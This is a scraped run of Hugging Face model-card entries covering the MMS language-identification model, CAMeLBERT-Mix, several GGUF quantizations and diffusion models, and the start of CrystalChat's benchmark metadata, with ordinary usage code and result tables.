| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q5_K_M.gguf) | Q5_K_M | 5.2 | |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q6_K.gguf) | Q6_K | 6.0 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.Q8_0.gguf) | Q8_0 | 7.8 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/SwedishBeagle-dareDPO-GGUF/resolve/main/SwedishBeagle-dareDPO.f16.gguf) | f16 | 14.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
facebook/mms-lid-126 | facebook | "2023-06-13T10:15:48Z" | 3,582 | 24 | transformers | [
"transformers",
"pytorch",
"safetensors",
"wav2vec2",
"audio-classification",
"mms",
"ab",
"af",
"ak",
"am",
"ar",
"as",
"av",
"ay",
"az",
"ba",
"bm",
"be",
"bn",
"bi",
"bo",
"sh",
"br",
"bg",
"ca",
"cs",
"ce",
"cv",
"ku",
"cy",
"da",
"de",
"dv",
"dz",
"el",
"en",
"eo",
"et",
"eu",
"ee",
"fo",
"fa",
"fj",
"fi",
"fr",
"fy",
"ff",
"ga",
"gl",
"gn",
"gu",
"zh",
"ht",
"ha",
"he",
"hi",
"hu",
"hy",
"ig",
"ia",
"ms",
"is",
"it",
"jv",
"ja",
"kn",
"ka",
"kk",
"kr",
"km",
"ki",
"rw",
"ky",
"ko",
"kv",
"lo",
"la",
"lv",
"ln",
"lt",
"lb",
"lg",
"mh",
"ml",
"mr",
"mk",
"mg",
"mt",
"mn",
"mi",
"my",
"nl",
"no",
"ne",
"ny",
"oc",
"om",
"or",
"os",
"pa",
"pl",
"pt",
"ps",
"qu",
"ro",
"rn",
"ru",
"sg",
"sk",
"sl",
"sm",
"sn",
"sd",
"so",
"es",
"sq",
"su",
"sv",
"sw",
"ta",
"tt",
"te",
"tg",
"tl",
"th",
"ti",
"ts",
"tr",
"uk",
"vi",
"wo",
"xh",
"yo",
"zu",
"za",
"dataset:google/fleurs",
"arxiv:2305.13516",
"license:cc-by-nc-4.0",
"endpoints_compatible",
"region:us"
] | audio-classification | "2023-06-13T08:44:05Z" | ---
tags:
- mms
language:
- ab
- af
- ak
- am
- ar
- as
- av
- ay
- az
- ba
- bm
- be
- bn
- bi
- bo
- sh
- br
- bg
- ca
- cs
- ce
- cv
- ku
- cy
- da
- de
- dv
- dz
- el
- en
- eo
- et
- eu
- ee
- fo
- fa
- fj
- fi
- fr
- fy
- ff
- ga
- gl
- gn
- gu
- zh
- ht
- ha
- he
- hi
- sh
- hu
- hy
- ig
- ia
- ms
- is
- it
- jv
- ja
- kn
- ka
- kk
- kr
- km
- ki
- rw
- ky
- ko
- kv
- lo
- la
- lv
- ln
- lt
- lb
- lg
- mh
- ml
- mr
- ms
- mk
- mg
- mt
- mn
- mi
- my
- zh
- nl
- 'no'
- 'no'
- ne
- ny
- oc
- om
- or
- os
- pa
- pl
- pt
- ms
- ps
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- qu
- ro
- rn
- ru
- sg
- sk
- sl
- sm
- sn
- sd
- so
- es
- sq
- su
- sv
- sw
- ta
- tt
- te
- tg
- tl
- th
- ti
- ts
- tr
- uk
- ms
- vi
- wo
- xh
- ms
- yo
- ms
- zu
- za
license: cc-by-nc-4.0
datasets:
- google/fleurs
metrics:
- acc
---
# Massively Multilingual Speech (MMS) - Finetuned LID
This checkpoint is a model fine-tuned for speech language identification (LID) and is part of Facebook's [Massively Multilingual Speech project](https://research.facebook.com/publications/scaling-speech-technology-to-1000-languages/).
This checkpoint is based on the [Wav2Vec2 architecture](https://huggingface.co/docs/transformers/model_doc/wav2vec2) and classifies raw audio input to a probability distribution over 126 output classes (each class representing a language).
The checkpoint consists of **1 billion parameters** and has been fine-tuned from [facebook/mms-1b](https://huggingface.co/facebook/mms-1b) on 126 languages.
## Table Of Content
- [Example](#example)
- [Supported Languages](#supported-languages)
- [Model details](#model-details)
- [Additional links](#additional-links)
## Example
This MMS checkpoint can be used with [Transformers](https://github.com/huggingface/transformers) to identify
the spoken language of an audio sample. It can recognize the [following 126 languages](#supported-languages).
Let's look at a simple example.
First, we install transformers and some other libraries
```
pip install torch accelerate torchaudio datasets
pip install --upgrade transformers
```
**Note**: In order to use MMS you need to have at least `transformers >= 4.30` installed. If the `4.30` version
is not yet available [on PyPI](https://pypi.org/project/transformers/) make sure to install `transformers` from
source:
```
pip install git+https://github.com/huggingface/transformers.git
```
Next, we load a couple of audio samples via `datasets`. Make sure that the audio data is sampled at 16,000 Hz (16 kHz).
```py
from datasets import load_dataset, Audio
# English
stream_data = load_dataset("mozilla-foundation/common_voice_13_0", "en", split="test", streaming=True)
stream_data = stream_data.cast_column("audio", Audio(sampling_rate=16000))
en_sample = next(iter(stream_data))["audio"]["array"]
# Arabic
stream_data = load_dataset("mozilla-foundation/common_voice_13_0", "ar", split="test", streaming=True)
stream_data = stream_data.cast_column("audio", Audio(sampling_rate=16000))
ar_sample = next(iter(stream_data))["audio"]["array"]
```
Next, we load the model and processor
```py
from transformers import Wav2Vec2ForSequenceClassification, AutoFeatureExtractor
import torch
model_id = "facebook/mms-lid-126"
processor = AutoFeatureExtractor.from_pretrained(model_id)
model = Wav2Vec2ForSequenceClassification.from_pretrained(model_id)
```
Now we process the audio data and pass it to the model to classify it into a language, just as we usually do for Wav2Vec2 audio classification models such as [ehcalabres/wav2vec2-lg-xlsr-en-speech-emotion-recognition](https://huggingface.co/harshit345/xlsr-wav2vec-speech-emotion-recognition)
```py
# English
inputs = processor(en_sample, sampling_rate=16_000, return_tensors="pt")
with torch.no_grad():
outputs = model(**inputs).logits
lang_id = torch.argmax(outputs, dim=-1)[0].item()
detected_lang = model.config.id2label[lang_id]
# 'eng'
# Arabic
inputs = processor(ar_sample, sampling_rate=16_000, return_tensors="pt")
with torch.no_grad():
outputs = model(**inputs).logits
lang_id = torch.argmax(outputs, dim=-1)[0].item()
detected_lang = model.config.id2label[lang_id]
# 'ara'
```
To see all the supported languages of a checkpoint, you can print out the language ids as follows:
```py
model.config.id2label.values()
```
For more details, about the architecture please have a look at [the official docs](https://huggingface.co/docs/transformers/main/en/model_doc/mms).
## Supported Languages
This model supports 126 languages. Click the following to toggle all supported languages of this checkpoint in [ISO 639-3 code](https://en.wikipedia.org/wiki/ISO_639-3).
You can find more details about the languages and their ISO 639-3 codes in the [MMS Language Coverage Overview](https://dl.fbaipublicfiles.com/mms/misc/language_coverage_mms.html).
<details>
<summary>Click to toggle</summary>
- ara
- cmn
- eng
- spa
- fra
- mlg
- swe
- por
- vie
- ful
- sun
- asm
- ben
- zlm
- kor
- ind
- hin
- tuk
- urd
- aze
- slv
- mon
- hau
- tel
- swh
- bod
- rus
- tur
- heb
- mar
- som
- tgl
- tat
- tha
- cat
- ron
- mal
- bel
- pol
- yor
- nld
- bul
- hat
- afr
- isl
- amh
- tam
- hun
- hrv
- lit
- cym
- fas
- mkd
- ell
- bos
- deu
- sqi
- jav
- nob
- uzb
- snd
- lat
- nya
- grn
- mya
- orm
- lin
- hye
- yue
- pan
- jpn
- kaz
- npi
- kat
- guj
- kan
- tgk
- ukr
- ces
- lav
- bak
- khm
- fao
- glg
- ltz
- lao
- mlt
- sin
- sna
- ita
- srp
- mri
- nno
- pus
- eus
- ory
- lug
- bre
- luo
- slk
- fin
- dan
- yid
- est
- ceb
- war
- san
- kir
- oci
- wol
- haw
- kam
- umb
- xho
- epo
- zul
- ibo
- abk
- ckb
- nso
- gle
- kea
- ast
- sco
- glv
- ina
</details>
## Model details
- **Developed by:** Vineel Pratap et al.
- **Model type:** Multi-lingual spoken language identification (LID) model
- **Language(s):** 126 languages, see [supported languages](#supported-languages)
- **License:** CC-BY-NC 4.0 license
- **Num parameters**: 1 billion
- **Audio sampling rate**: 16,000 Hz (16 kHz)
- **Cite as:**
@article{pratap2023mms,
title={Scaling Speech Technology to 1,000+ Languages},
author={Vineel Pratap and Andros Tjandra and Bowen Shi and Paden Tomasello and Arun Babu and Sayani Kundu and Ali Elkahky and Zhaoheng Ni and Apoorv Vyas and Maryam Fazel-Zarandi and Alexei Baevski and Yossi Adi and Xiaohui Zhang and Wei-Ning Hsu and Alexis Conneau and Michael Auli},
journal={arXiv},
year={2023}
}
## Additional Links
- [Blog post](https://ai.facebook.com/blog/multilingual-model-speech-recognition/)
- [Transformers documentation](https://huggingface.co/docs/transformers/main/en/model_doc/mms).
- [Paper](https://arxiv.org/abs/2305.13516)
- [GitHub Repository](https://github.com/facebookresearch/fairseq/tree/main/examples/mms#asr)
- [Other **MMS** checkpoints](https://huggingface.co/models?other=mms)
- MMS base checkpoints:
- [facebook/mms-1b](https://huggingface.co/facebook/mms-1b)
- [facebook/mms-300m](https://huggingface.co/facebook/mms-300m)
- [Official Space](https://huggingface.co/spaces/facebook/MMS)
|
digiplay/7pa-VAE | digiplay | "2024-05-22T07:49:24Z" | 3,582 | 3 | diffusers | [
"diffusers",
"safetensors",
"license:other",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2024-05-21T10:24:30Z" | ---
license: other
---
Model info:
Author : LotusSnacks
https://civitai.com/models/13468?modelVersionId=15869
This version has the 84000 VAE baked in.
No-VAE version:
AIARTCHAN/7pa
https://huggingface.co/AIARTCHAN/7pa
Another model from the author:
[CoffewithLotus]
https://tensor.art/models/701383986661892674
Sample prompts and images generated via Hugging Face's API:
1girl ultra-detailed outdoor 4k masterpiece, clear lines,

sky Angel wings 4k 8k masterpiece realistic light rainbow paint outerspace stars

|
lenssssw/roblox-clothing-ai-maker | lenssssw | "2023-11-04T23:22:00Z" | 3,581 | 5 | diffusers | [
"diffusers",
"text-to-image",
"stable-diffusion",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-03-11T15:40:28Z" | ---
license: creativeml-openrail-m
tags:
- text-to-image
- stable-diffusion
---
THIS MODEL NO LONGER GIVES THE SAME RESULTS AS IT USED TO (shown below)
Sample Images:
clothing template with a shirt red and a tie blue:

clothing template with a suit golden:

clothing template with a shirt beige PHOTOREALISTIC:
 |
Emilio407/dolphin-2.9.2-qwen2-7b-GGUF | Emilio407 | "2024-06-22T04:48:53Z" | 3,581 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-06T22:26:27Z" | Entry not found |
CAMeL-Lab/bert-base-arabic-camelbert-mix | CAMeL-Lab | "2021-09-14T14:34:32Z" | 3,579 | 11 | transformers | [
"transformers",
"pytorch",
"tf",
"jax",
"bert",
"fill-mask",
"Arabic",
"Dialect",
"Egyptian",
"Gulf",
"Levantine",
"Classical Arabic",
"MSA",
"Modern Standard Arabic",
"ar",
"arxiv:2103.06678",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | fill-mask | "2022-03-02T23:29:04Z" | ---
language:
- ar
license: apache-2.0
tags:
- Arabic
- Dialect
- Egyptian
- Gulf
- Levantine
- Classical Arabic
- MSA
- Modern Standard Arabic
widget:
- text: "الهدف من الحياة هو [MASK] ."
---
# CAMeLBERT: A collection of pre-trained models for Arabic NLP tasks
## Model description
**CAMeLBERT** is a collection of BERT models pre-trained on Arabic texts with different sizes and variants.
We release pre-trained language models for Modern Standard Arabic (MSA), dialectal Arabic (DA), and classical Arabic (CA), in addition to a model pre-trained on a mix of the three.
We also provide additional models that are pre-trained on a scaled-down set of the MSA variant (half, quarter, eighth, and sixteenth).
The details are described in the paper *"[The Interplay of Variant, Size, and Task Type in Arabic Pre-trained Language Models](https://arxiv.org/abs/2103.06678)."*
This model card describes **CAMeLBERT-Mix** (`bert-base-arabic-camelbert-mix`), a model pre-trained on a mixture of these variants: MSA, DA, and CA.
||Model|Variant|Size|#Word|
|-|-|:-:|-:|-:|
|✔|`bert-base-arabic-camelbert-mix`|CA,DA,MSA|167GB|17.3B|
||`bert-base-arabic-camelbert-ca`|CA|6GB|847M|
||`bert-base-arabic-camelbert-da`|DA|54GB|5.8B|
||`bert-base-arabic-camelbert-msa`|MSA|107GB|12.6B|
||`bert-base-arabic-camelbert-msa-half`|MSA|53GB|6.3B|
||`bert-base-arabic-camelbert-msa-quarter`|MSA|27GB|3.1B|
||`bert-base-arabic-camelbert-msa-eighth`|MSA|14GB|1.6B|
||`bert-base-arabic-camelbert-msa-sixteenth`|MSA|6GB|746M|
## Intended uses
You can use the released model for either masked language modeling or next sentence prediction.
However, it is mostly intended to be fine-tuned on an NLP task, such as NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
We release our fine-tuning code [here](https://github.com/CAMeL-Lab/CAMeLBERT).
#### How to use
You can use this model directly with a pipeline for masked language modeling:
```python
>>> from transformers import pipeline
>>> unmasker = pipeline('fill-mask', model='CAMeL-Lab/bert-base-arabic-camelbert-mix')
>>> unmasker("الهدف من الحياة هو [MASK] .")
[{'sequence': '[CLS] الهدف من الحياة هو النجاح. [SEP]',
'score': 0.10861027985811234,
'token': 6232,
'token_str': 'النجاح'},
{'sequence': '[CLS] الهدف من الحياة هو.. [SEP]',
'score': 0.07626965641975403,
'token': 18,
'token_str': '.'},
{'sequence': '[CLS] الهدف من الحياة هو الحياة. [SEP]',
'score': 0.05131986364722252,
'token': 3696,
'token_str': 'الحياة'},
{'sequence': '[CLS] الهدف من الحياة هو الموت. [SEP]',
'score': 0.03734956309199333,
'token': 4295,
'token_str': 'الموت'},
{'sequence': '[CLS] الهدف من الحياة هو العمل. [SEP]',
'score': 0.027189988642930984,
'token': 2854,
'token_str': 'العمل'}]
```
*Note*: to download our models, you would need `transformers>=3.5.0`. Otherwise, you could download the models manually.
Here is how to use this model to get the features of a given text in PyTorch:
```python
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
model = AutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='pt')
output = model(**encoded_input)
```
and in TensorFlow:
```python
from transformers import AutoTokenizer, TFAutoModel
tokenizer = AutoTokenizer.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
model = TFAutoModel.from_pretrained('CAMeL-Lab/bert-base-arabic-camelbert-mix')
text = "مرحبا يا عالم."
encoded_input = tokenizer(text, return_tensors='tf')
output = model(encoded_input)
```
## Training data
- MSA (Modern Standard Arabic)
- [The Arabic Gigaword Fifth Edition](https://catalog.ldc.upenn.edu/LDC2011T11)
- [Abu El-Khair Corpus](http://www.abuelkhair.net/index.php/en/arabic/abu-el-khair-corpus)
- [OSIAN corpus](https://vlo.clarin.eu/search;jsessionid=31066390B2C9E8C6304845BA79869AC1?1&q=osian)
- [Arabic Wikipedia](https://archive.org/details/arwiki-20190201)
- The unshuffled version of the Arabic [OSCAR corpus](https://oscar-corpus.com/)
- DA (dialectal Arabic)
- A collection of dialectal Arabic data described in [our paper](https://arxiv.org/abs/2103.06678).
- CA (classical Arabic)
- [OpenITI (Version 2020.1.2)](https://zenodo.org/record/3891466#.YEX4-F0zbzc)
## Training procedure
We use [the original implementation](https://github.com/google-research/bert) released by Google for pre-training.
We follow the original English BERT model's hyperparameters for pre-training, unless otherwise specified.
### Preprocessing
- After extracting the raw text from each corpus, we apply the following pre-processing.
- We first remove invalid characters and normalize white spaces using the utilities provided by [the original BERT implementation](https://github.com/google-research/bert/blob/eedf5716ce1268e56f0a50264a88cafad334ac61/tokenization.py#L286-L297).
- We also remove lines without any Arabic characters.
- We then remove diacritics and kashida using [CAMeL Tools](https://github.com/CAMeL-Lab/camel_tools) (a small sketch of this step follows this list).
- Finally, we split each line into sentences with a heuristics-based sentence segmenter.
- We train a WordPiece tokenizer on the entire dataset (167 GB text) with a vocabulary size of 30,000 using [HuggingFace's tokenizers](https://github.com/huggingface/tokenizers).
- We do not lowercase letters nor strip accents.
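As a small illustration of the diacritics-removal step above, the following sketch assumes the `dediac_ar` utility from CAMeL Tools (`pip install camel-tools`); the example string is a placeholder:
```python
# Hedged sketch of the dediacritization step (assumes camel_tools is installed).
from camel_tools.utils.dediac import dediac_ar

text = "الْهَدَفُ مِنَ الْحَيَاةِ هُوَ النَّجَاحُ."
print(dediac_ar(text))  # prints the same sentence with diacritics stripped
```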
### Pre-training
- The model was trained on a single cloud TPU (`v3-8`) for one million steps in total.
- The first 90,000 steps were trained with a batch size of 1,024 and the rest was trained with a batch size of 256.
- The sequence length was limited to 128 tokens for 90% of the steps and 512 for the remaining 10%.
- We use whole word masking and a duplicate factor of 10.
- We set max predictions per sequence to 20 for the dataset with max sequence length of 128 tokens and 80 for the dataset with max sequence length of 512 tokens.
- We use a random seed of 12345, masked language model probability of 0.15, and short sequence probability of 0.1.
- The optimizer used is Adam with a learning rate of 1e-4, \\(\beta_{1} = 0.9\\) and \\(\beta_{2} = 0.999\\), a weight decay of 0.01, learning rate warmup for 10,000 steps and linear decay of the learning rate after.
## Evaluation results
- We evaluate our pre-trained language models on five NLP tasks: NER, POS tagging, sentiment analysis, dialect identification, and poetry classification.
- We fine-tune and evaluate the models using 12 dataset.
- We used Hugging Face's transformers to fine-tune our CAMeLBERT models.
- We used transformers `v3.1.0` along with PyTorch `v1.5.1`.
- The fine-tuning was done by adding a fully connected linear layer to the last hidden state (a minimal sketch follows this list).
- We use \\(F_{1}\\) score as a metric for all tasks.
- Code used for fine-tuning is available [here](https://github.com/CAMeL-Lab/CAMeLBERT).
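A hedged sketch of such a setup with a sequence-classification head is shown below; this is not the authors' exact training code (see the linked repository for that), and the label count is a placeholder:
```python
# Hedged sketch of a classification fine-tuning setup (not the authors' exact code).
from transformers import AutoTokenizer, AutoModelForSequenceClassification

model_name = "CAMeL-Lab/bert-base-arabic-camelbert-mix"
tokenizer = AutoTokenizer.from_pretrained(model_name)
# This head adds a fully connected linear layer on top of the pooled output,
# matching the setup described above; num_labels is task-dependent.
model = AutoModelForSequenceClassification.from_pretrained(model_name, num_labels=3)

batch = tokenizer(["مرحبا يا عالم."], return_tensors="pt", padding=True)
logits = model(**batch).logits
print(logits.shape)  # torch.Size([1, 3])
```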
### Results
| Task | Dataset | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | --------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| NER | ANERcorp | MSA | 80.8% | 67.9% | 74.1% | 82.4% | 82.0% | 82.1% | 82.6% | 80.8% |
| POS | PATB (MSA) | MSA | 98.1% | 97.8% | 97.7% | 98.3% | 98.2% | 98.3% | 98.2% | 98.2% |
| | ARZTB (EGY) | DA | 93.6% | 92.3% | 92.7% | 93.6% | 93.6% | 93.7% | 93.6% | 93.6% |
| | Gumar (GLF) | DA | 97.3% | 97.7% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% | 97.9% |
| SA | ASTD | MSA | 76.3% | 69.4% | 74.6% | 76.9% | 76.0% | 76.8% | 76.7% | 75.3% |
| | ArSAS | MSA | 92.7% | 89.4% | 91.8% | 93.0% | 92.6% | 92.5% | 92.5% | 92.3% |
| | SemEval | MSA | 69.0% | 58.5% | 68.4% | 72.1% | 70.7% | 72.8% | 71.6% | 71.2% |
| DID | MADAR-26 | DA | 62.9% | 61.9% | 61.8% | 62.6% | 62.0% | 62.8% | 62.0% | 62.2% |
| | MADAR-6 | DA | 92.5% | 91.5% | 92.2% | 91.9% | 91.8% | 92.2% | 92.1% | 92.0% |
| | MADAR-Twitter-5 | MSA | 75.7% | 71.4% | 74.2% | 77.6% | 78.5% | 77.3% | 77.7% | 76.2% |
| | NADI | DA | 24.7% | 17.3% | 20.1% | 24.9% | 24.6% | 24.6% | 24.9% | 23.8% |
| Poetry | APCD | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
### Results (Average)
| | Variant | Mix | CA | DA | MSA | MSA-1/2 | MSA-1/4 | MSA-1/8 | MSA-1/16 |
| -------------------- | ------- | ----- | ----- | ----- | ----- | ------- | ------- | ------- | -------- |
| Variant-wise-average<sup>[[1]](#footnote-1)</sup> | MSA | 82.1% | 75.7% | 80.1% | 83.4% | 83.0% | 83.3% | 83.2% | 82.3% |
| | DA | 74.4% | 72.1% | 72.9% | 74.2% | 74.0% | 74.3% | 74.1% | 73.9% |
| | CA | 79.8% | 80.9% | 79.6% | 79.7% | 79.9% | 80.0% | 79.7% | 79.8% |
| Macro-Average | ALL | 78.7% | 74.7% | 77.1% | 79.2% | 79.0% | 79.2% | 79.1% | 78.6% |
<a name="footnote-1">[1]</a>: Variant-wise-average refers to average over a group of tasks in the same language variant.
## Acknowledgements
This research was supported with Cloud TPUs from Google’s TensorFlow Research Cloud (TFRC).
## Citation
```bibtex
@inproceedings{inoue-etal-2021-interplay,
title = "The Interplay of Variant, Size, and Task Type in {A}rabic Pre-trained Language Models",
author = "Inoue, Go and
Alhafni, Bashar and
Baimukan, Nurpeiis and
Bouamor, Houda and
Habash, Nizar",
booktitle = "Proceedings of the Sixth Arabic Natural Language Processing Workshop",
month = apr,
year = "2021",
address = "Kyiv, Ukraine (Online)",
publisher = "Association for Computational Linguistics",
abstract = "In this paper, we explore the effects of language variants, data sizes, and fine-tuning task types in Arabic pre-trained language models. To do so, we build three pre-trained language models across three variants of Arabic: Modern Standard Arabic (MSA), dialectal Arabic, and classical Arabic, in addition to a fourth language model which is pre-trained on a mix of the three. We also examine the importance of pre-training data size by building additional models that are pre-trained on a scaled-down set of the MSA variant. We compare our different models to each other, as well as to eight publicly available models by fine-tuning them on five NLP tasks spanning 12 datasets. Our results suggest that the variant proximity of pre-training data to fine-tuning data is more important than the pre-training data size. We exploit this insight in defining an optimized system selection model for the studied tasks.",
}
```
|
NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF | NikolayKozloff | "2024-06-30T17:06:50Z" | 3,579 | 1 | null | [
"gguf",
"llama-cpp",
"gguf-my-repo",
"en",
"base_model:Sao10K/Fimbulvetr-11B-v2.1-16K",
"license:cc-by-nc-4.0",
"region:us"
] | null | "2024-06-30T17:06:20Z" | ---
base_model: Sao10K/Fimbulvetr-11B-v2.1-16K
language:
- en
license: cc-by-nc-4.0
tags:
- llama-cpp
- gguf-my-repo
---
# NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF
This model was converted to GGUF format from [`Sao10K/Fimbulvetr-11B-v2.1-16K`](https://huggingface.co/Sao10K/Fimbulvetr-11B-v2.1-16K) using llama.cpp via ggml.ai's [GGUF-my-repo](https://huggingface.co/spaces/ggml-org/gguf-my-repo) space.
Refer to the [original model card](https://huggingface.co/Sao10K/Fimbulvetr-11B-v2.1-16K) for more details on the model.
## Use with llama.cpp
Install llama.cpp through brew (works on Mac and Linux)
```bash
brew install llama.cpp
```
Invoke the llama.cpp server or the CLI.
### CLI:
```bash
llama-cli --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -p "The meaning to life and the universe is"
```
### Server:
```bash
llama-server --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -c 2048
```
Note: You can also use this checkpoint directly through the [usage steps](https://github.com/ggerganov/llama.cpp?tab=readme-ov-file#usage) listed in the Llama.cpp repo as well.
Step 1: Clone llama.cpp from GitHub.
```
git clone https://github.com/ggerganov/llama.cpp
```
Step 2: Move into the llama.cpp folder and build it with `LLAMA_CURL=1` flag along with other hardware-specific flags (for ex: LLAMA_CUDA=1 for Nvidia GPUs on Linux).
```
cd llama.cpp && LLAMA_CURL=1 make
```
Step 3: Run inference through the main binary.
```
./llama-cli --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -p "The meaning to life and the universe is"
```
or
```
./llama-server --hf-repo NikolayKozloff/Fimbulvetr-11B-v2.1-16K-Q5_0-GGUF --hf-file fimbulvetr-11b-v2.1-16k-q5_0.gguf -c 2048
```
|
LLM360/CrystalChat | LLM360 | "2024-06-17T19:30:17Z" | 3,578 | 35 | transformers | [
"transformers",
"pytorch",
"crystalcoder",
"text-generation",
"llm",
"code",
"custom_code",
"en",
"dataset:openaccess-ai-collective/oasst1-guanaco-extended-sharegpt",
"dataset:Open-Orca/SlimOrca",
"dataset:AtAndDev/ShareGPT-Vicuna-v3-cleaned-unfiltered",
"dataset:WizardLM/WizardLM_evol_instruct_V2_196k",
"dataset:winglian/chatlogs-en-cleaned",
"dataset:HuggingFaceH4/CodeAlpaca_20K",
"dataset:theblackcat102/evol-codealpaca-v1",
"dataset:nickrosh/Evol-Instruct-Code-80k-v1",
"dataset:open-phi/textbooks",
"dataset:open-phi/programming_books_llama",
"dataset:LLM360/CrystalCoderDatasets",
"arxiv:2312.06550",
"license:apache-2.0",
"model-index",
"autotrain_compatible",
"region:us"
] | text-generation | "2024-01-08T18:53:29Z" | ---
license: apache-2.0
language:
- en
pipeline_tag: text-generation
library_name: transformers
widget:
- example_title: Explain the name of CrystalChat
text: >-
<s> <|sys_start|> You are an AI assistant. You will be given a task. You must generate a detailed
and long answer. <|sys_end|> <|im_start|> Give me a one-sentence description of crystal. And tell me what
might the name "Crystal" mean for a transparant and open-source language model? <|im_end|>
output:
text: >-
A crystal is an ordered, hexagonal lattice of atoms that displays a unique crystal structure resulting in transparency and diverse physical and chemical properties, and as a transparent and open-source language model, "Crystal" might represent transparency and accessibility by enabling users to understand the inner workings of the model.</s>
- example_title: Write python function and explain
text: >-
<s> <|sys_start|> You are an AI assistant. You will be given a task. You
must generate a detailed and long answer. <|sys_end|> <|im_start|> Write a
python function that takes a list of integers and returns the squared sum of
the list. <|im_end|>
output:
text: "\n\nHere's a Python function named `squared_sum_list` that takes a list of integers as input and returns the squared sum of the list:\n\n```python\ndef squared_sum_list(lst):\n\treturn sum([num ** 2 for num in lst])\n```\nThe function `squared_sum_list` uses a list comprehension to iterate over each number in the input list `lst` and calculate its square. Then, it uses the `sum` function to accumulate all the squared numbers in a single value - the squared sum of the list.\n\nFor example:\n\n```python\nnumbers = [1, 2, 3, 4, 5]\nprint(squared_sum_list(numbers)) # Outputs: 55\n```\n\nIn the above code, the list `[1, 2, 3, 4, 5]` is passed as an argument to the `squared_sum_list` function. The function calculates the sum of the squares of the elements in the list, which is `1 + 4 + 9 + 16 + 25 = 55`. The function then returns this result, which is printed to the console.</s>"
tags:
- llm
- code
datasets:
- openaccess-ai-collective/oasst1-guanaco-extended-sharegpt
- Open-Orca/SlimOrca
- AtAndDev/ShareGPT-Vicuna-v3-cleaned-unfiltered
- WizardLM/WizardLM_evol_instruct_V2_196k
- winglian/chatlogs-en-cleaned
- HuggingFaceH4/CodeAlpaca_20K
- theblackcat102/evol-codealpaca-v1
- nickrosh/Evol-Instruct-Code-80k-v1
- open-phi/textbooks
- open-phi/programming_books_llama
- LLM360/CrystalCoderDatasets
model-index:
- name: CrystalChat
results:
- task:
type: text-generation
dataset:
type: openai_humanneval
name: OpenAI HumanEval
metrics:
- name: pass@1 (t=0.2)
type: pass@1
value: 34.116
- name: pass@10 (t=0.8)
type: pass@10
value: 65.755
- task:
type: text-generation
dataset:
type: mbpp
name: Mostly Basic Python Problems (mbpp)
metrics:
- name: pass@1 (t=0.1)
type: pass@1
value: 39.112
- name: pass@10 (t=0.8)
type: pass@10
value: 59.895
- task:
type: multiple-choice
dataset:
type: race
name: RACE
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 41.148
- task:
type: multiple-choice
dataset:
type: mmlu
name: Measuring Massive Multitask Language Understanding (MMLU)
metrics:
- name: Accuracy (5 shot)
type: accuracy
value: 53.215
- name: Accuracy (0 shot)
type: accuracy
value: 52.789
- task:
type: multiple-choice
dataset:
type: truthful_qa
name: Truthful QA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 47.29
- task:
type: multiple-choice
dataset:
type: winogrande
name: Winogrande
metrics:
- name: Accuracy (5 shot)
type: accuracy
value: 70.639
- name: Accuracy (0 shot)
type: accuracy
value: 68.114
- task:
type: multiple-choice
dataset:
type: copa
name: COPA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 85
- task:
type: text-classification
dataset:
type: boolq
name: Boolq
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 82.783
- task:
type: question-answering
dataset:
type: openbookqa
name: Openbook QA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 42
- task:
type: multiple-choice
dataset:
type: hellaSwag
name: HellaSwag
metrics:
- name: Accuracy (10-shot)
type: accuracy
value: 76.12
- name: Accuracy (0-shot)
type: accuracy
value: 73.312
- task:
type: question-answering
dataset:
type: piqa
name: PIQA
metrics:
- name: Accuracy (0 shot)
type: accuracy
value: 77.856
- task:
type: question-answering
dataset:
type: ai2_arc
name: ARC (Easy)
metrics:
- name: Accuracy (0 shot)
